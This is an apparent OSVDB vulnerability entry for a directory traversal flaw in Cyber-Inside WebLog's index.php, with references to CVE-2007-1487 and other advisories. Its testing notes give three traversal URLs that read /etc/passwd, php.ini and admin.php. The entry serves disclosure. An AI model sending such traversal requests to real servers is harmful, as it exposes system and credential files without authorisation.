Cyber-Inside WebLog index.php showarticles Action file Variable Traversal Arbitrary File Access

2007-03-15T06:33:59
ID OSVDB:34043
Type osvdb
Reporter OSVDB
Modified 2007-03-15T06:33:59

Description

Manual Testing Notes

http://localhost/blog/index.php?how=showarticles&file=../../../../windows/php.ini http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd http://localhost/blog/index.php?show=showarticles&file=../admin.php

References:

Secunia Advisory ID:24521 Other Advisory URL: http://milw0rm.com/exploits/3484 ISS X-Force ID: 32998 FrSIRT Advisory: ADV-2007-0967 CVE-2007-1487 Bugtraq ID: 22995